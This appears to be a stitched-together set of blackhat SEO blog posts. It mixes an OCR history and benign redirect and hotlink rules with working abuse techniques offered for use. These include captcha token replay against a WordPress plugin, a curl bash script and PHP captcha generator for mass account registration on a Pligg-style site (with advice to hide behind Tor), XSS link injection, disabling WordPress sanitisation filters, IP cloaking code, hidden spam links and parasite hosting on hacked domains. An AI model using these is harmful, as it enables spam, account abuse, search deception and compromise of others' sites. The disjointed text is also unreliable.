Toralv Dirro der Sicherheitsexperte von McAfee sagt:”Programme, um Captchas automatisch zu analysieren, gibt es seit etwa eineinhalb Jahren”

Toralv Dirro security expert from McAfee says: “Programs which automatically break captchas exist since about one and a half years”

Ok mr smart mouth should get his facts straight and google for OCR Optical Character Recognition is much older, which is the base of all the captcha breaking algorythms.

While captchas may be a new thing, the tools used to break these images existed already ages ago. For example GOCR a popular tool on the Linux platform for captcha breaking, existed before captchas where even invented. In fact the whole OCR stuff dates back to as far as 1929 as you can read here:

The History of Optical Character Recognition

Tauschek’s machine was a mechanical device that used templates. A photodetector was placed so that when the template and the character to be recognised were lined up for an exact match and a light was directed towards them, no light would reach the photodetector.

In 1950, David H. Shepard, a cryptanalyst at the Armed Forces Security Agency in the United States, was asked by Frank Rowlett, who had broken the Japanese PURPLE diplomatic code, to work with Dr. Louis Tordella to recommend data automation procedures for the Agency. This included the problem of converting printed messages into machine language for computer processing. Shepard decided it must be possible to build a machine to do this, and, with the help of Harvey Cook, a friend, built “Gismo” in his attic during evenings and weekends. This was reported in the Washington Daily News on 27 April 1951 and in the New York Times on 26 December 1953 after his U.S. Patent Number 2,663,758 was issued. Shepard then founded Intelligent Machines Research Corporation (IMR), which went on to deliver the world’s first several OCR systems used in commercial operation. While both Gismo and the later IMR systems used image analysis, as opposed to character matching, and could accept some font variation, Gismo was limited to reasonably close vertical registration, whereas the following commercial IMR scanners analyzed characters anywhere in the scanned field, a practical necessity on real world documents.

Original article about xrumer and the stupid mcafee comment can be found here (in german):http://www.virenschutz.info/beitrag-neu-Hacker-Software-XRumer-5-2556.html

Lets have a look at the captcha url:

http://blog.tld/wp-content/plugins/captcha.php/?token=jo26gz

So here we have the Token that is used to identify the captcha. Now all you have to do is to solve one captcha and save the token aswell as the result text. Then sniff out the HTTP POST request so you can built your own submission script and just add the token and solved text as static value. Yes, belive it or not, it will work. Its really that simple.

For wordpress this would look like:

stage=validate-user-signup&user_name=fsddsf&user_email=fdsfds%40fsdfds.com&spamCode=fb9f7c&mcode=jo26gz&signup_for=blog&chkread=&submit=Next+%C2%BB

Obviously spamCode and mcode will be used as static value in each request. This is just one example of a basic design flaw in a certain captcha implementation. I’m sure you can spot more out there

So what can you do with XSS? You can create your own html code inside the webpage filled with keywords and your link(s) for google to pick it up. The better way however is to find 301 redirects in scripts that send this information with a normal GET request i.e. some.php?new_url=http://yourdomain.com . Hopefully you see the advantage of this trick. If not just move on, you arent ready yet

// add_filter(‘content_save_pre’, ‘wp_filter_post_kses’);
// add_filter(‘excerpt_save_pre’, ‘wp_filter_post_kses’);
// add_filter(‘content_filtered_save_pre’, ‘wp_filter_post_kses’);

Now JavaScript is enabled again

RewriteEngine on
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http://mydomain.com/.*$ [NC]
RewriteCond %{HTTP_REFERER} !^http://mydomain.com$ [NC]
RewriteCond %{HTTP_REFERER} !^http://www.mydomain.com/.*$ [NC]
RewriteCond %{HTTP_REFERER} !^http://www.mydomain.com$ [NC]
RewriteRule .*\.(jpg|jpeg|gif|png|bmp)$ REPLACEMENT.jpg [R,NC]

Obviously you have to change the values first to reflect your website. Put up the image that you want to display for hotlinkers – in this case i named it REPLACEMENT.jpg but you can name it anything you want. Here you go, now noone is able to hotlink your precious images anymore!

For the long run your always better off (especially for whitehat sites) with rich content and some thought put behind your linking.

$ip = $_SERVER['REMOTE_ADDR'];
$file = file_get_contents(“http://domain.tld/ip.txt”);
$pos = strpos($file, “$ip”);

if ($pos === false) {
include(“index1.php”);
} else {
include(“index2.php”);
}

Great you have cloaked your first site. This is a very simple cloaking example, there is some more advanced software out there, but basicially it all boils down to that. Google is ok with cloaking as long as you dont present a completely changed site to the google bot only, like 1000’s of keywords in <H1> ..if you modify your original site to include more keywords etc, it seems to work fine. When you read the Terms of google you can see that cloaking isn’t evil in first place, only if its done in a spammy way. Still even done in a spammy way it seems to work most of the time, but can get your site banned from the google index, so use it at own risk.

An example ocr software is gocr which can be used from the command line in linux. In combination with image manipulation software it can be trained to break certain captcha images. Basicially what you have to do is make the characters visible and aligned as much as possible. By removing background noise and colors you make it more readable for the ocr software later. You do this by applying filters to the captcha Image using your Image manipulation Software such as ImageMagic for linux.

here is an example using bash script and curl:

#!/bin/sh

host=$1

user=$2

pass=$3

email=$4

tmp=”p.tmp”

curl -v -L -b cookie -c cookie -s –connect-timeout 10 -A “Mozilla 5.0″ “$host/register.php” -d “username=$user&email=$email&password=$pass&password2=$pass&submit=Create+user&process=1″ -o $tmp

…

ok now with some regex you need to get the following values

echo “reghash..: $reghash”
echo “code…..: $code”
echo “captcha..: $decode”

wait,wait,wait how the f*uck should i get the damn captcha value??? In this case we dont need any advanced captcha breaking or anything, we just decode it. Luckily there is a pretty cool design error, which lets us decode this stupid captcha in milliseconds. No need for any OCR. All we need is the following php:

<?php

$sitekey=82397834;

$ts_random=$_REQUEST['ts_random'];

$datekey = date(“F j”);

$rcode = hexdec(md5($_SERVER['HTTP_USER_AGENT'] . $sitekey . $ts_random . $datekey));

print substr($rcode, 2, 6);

?>

because “sitekey” is static, we can generate the captcha result, no need to even look at the image. All we need is to obtain the ts_random value (which is inside the html of the registration page) and pass it to that php.

Ok now that we have all values, we need to send one final request:

curl -s -L -b cookie -c cookie -s –connect-timeout 10 -A “$ag” “$host/register.php” -d “ts_random=$code&ts_code=$decode&submit=Continue&process=2&email=$email&username=$user&password=$pass&reghash=$reghash” -o $tmp

Thats it now we can create unlimited users. Logging in and posting a link is equally easy, aswell as posting comments or voting for certain stories. That way you can create your very own and fully automated auto pligg for cheap a little side note, you should use proxies or better use tor. Both HTTP proxies and tor via socks is fully supported by curl.

Many people keep asking me what parasite hosting is and how it works. Well parasite hosting is done by posting own html pages on a remote server that you do not own. In this case the Attacker uses a Domain with preferably high PageRank and Domain Age so it has authority. These Domains usually rank much faster and higher than other domains and thus can be used perfectly as redirects. Offten it is done by directly hacking a certain domain, or because a site allows user supplied content with html code and possibly java script. A Keyword/Link filled site and maybe a redirect to an affiliate will be created. Once the content is in place, the Attacker starts to promote that link by dropping backlinks to it. Soon the site is probably ranking very high for the attackers chosen keyword.  You can find many .edu and even .gov sites ranking if you search for certain spammy keywords such as “buy viagra”. Don’t try at home kids, unless you know what you are doing..

<font style=”overflow: hidden; position: absolute; height: 0pt; width: 0pt”><a href=”http://URL.com/”>TEXT</a></font>

There are several ways to launch such a redirect either by java script, or any other popular Web Scripting language such as php,asp etc.

here is a small example javascript redirect:

<script type=”text/javascript”>
window.location.href=’http://domain.tld’;
</script>

You can also redirect using Meta tags, but i wouldn’t reccomend it to you…

The safest way is probably the mod_rewrite which would be added to your .htaccess file like that:

RewriteRule ^olddomain.tld/olddirectory/(.*)$ http://newdomain.tld/ [R=301,L]

Now if you don’t use mod_rewrite then you can also do it like that:

redirect 301 / http://www.olddomain.tld/
http://www.newdomain.tld/